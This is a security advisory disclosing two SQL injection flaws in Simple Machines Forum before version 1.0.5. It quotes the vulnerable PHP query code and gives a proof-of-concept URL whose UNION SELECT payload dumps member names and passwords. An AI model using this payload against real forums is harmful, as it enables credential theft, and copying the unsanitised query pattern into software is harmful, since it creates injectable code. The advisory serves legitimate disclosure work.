Description:
SMF or Simple Machines Forum as it is probably better known as
is a very popular forum system, and developed by members of the
YaBB SE development team. Simple Machine Forums versions prior
to the recently released 1.0.5 are vulnerable to a very serious
SQL Injection hole, as well as a more obscure, harder to exploit
SQL Injection hole. Both vulnerabilities have been resolved and
users should upgrade to the latest version of SMF immediately.
SQL Injection:
The first SQL Injection I will discuss is not very easy exploitable
by default conditions, but I will talk about it anyway. Let's have
a look at the vulnerable code in question. Search.php @ line 543
elseif (!$use_cache || $numResults <= $modSettings['search_results_per_page'])
{
$sort = array();
$request = db_query("
SELECT
t.ID_TOPIC, COUNT(m.ID_MSG) AS numMsg, MAX(m.ID_MSG) AS lastMatch,
MIN(m.ID_MSG) AS firstMatch,
COUNT(m.ID_MSG) AS num_matches
FROM {$db_prefix}topics AS t
LEFT JOIN {$db_prefix}messages AS m ON (m.ID_TOPIC = t.ID_TOPIC AND
$searchQuery)" . (empty($userQuery) ? '
WHERE t.ID_TOPIC IN (' . implode(', ', array_keys($matchingTopics)) . ')' : "
WHERE $userQuery
AND t.ID_TOPIC IN (" . implode(', ', array_keys($matchingTopics)) . ")") . "
GROUP BY t.ID_TOPIC
LIMIT $_REQUEST[start], $modSettings[search_results_per_page]",
__FILE__, __LINE__);
$tmp = array();
while ($row = mysql_fetch_assoc($request))
$_REQUEST[start] clearly comes after the LIMIT is given, but because
we don't use ORDER BY we can still use UNION functionality! The other
SQL Injection issue is far more serious and will allow an attacker to
easily retrieve arbitrary data from the database. The other vulnerability
is in the function getTopic()
// If you're modifying, get only those posts before the current one.
$request = db_query("
SELECT IFNULL(mem.realName, m.posterName) AS posterName, m.posterTime, m.body,
m.smileysEnabled, m.ID_MSG
FROM {$db_prefix}messages AS m
LEFT JOIN {$db_prefix}members AS mem ON (mem.ID_MEMBER = m.ID_MEMBER)
WHERE m.ID_TOPIC = $topic" . (isset($_REQUEST['msg']) ? "
AND m.ID_MSG < $_REQUEST[msg]" : '') . "
ORDER BY m.ID_MSG DESC" . ($modSettings['topicSummaryPosts'] >= 0 ? '
LIMIT ' . (int) $modSettings['topicSummaryPosts'] : ''), __FILE__, __LINE__);
As we can see $_REQUEST[msg] is never sanitized and placed right in the
middle of a SELECT making it highly exploitable.
http://smf/index.php?action=post;msg=1%20UNION%20SELECT%20memberName,0,passwd,
0,0%20FROM%20smf_members%20WHERE%201/*;topic=8.0;sesc=[VALIDSESCIDHERE]
The above example would dump the entire database username and passwords
into the comments area when editing a post. This vuln is very dangerous!
Solution:
The SMF guys were very prompt in both their response and their release
of a patched version. All users should upgrade now!
Credits:
James Bercegay of the GulfTech Security Research Team
|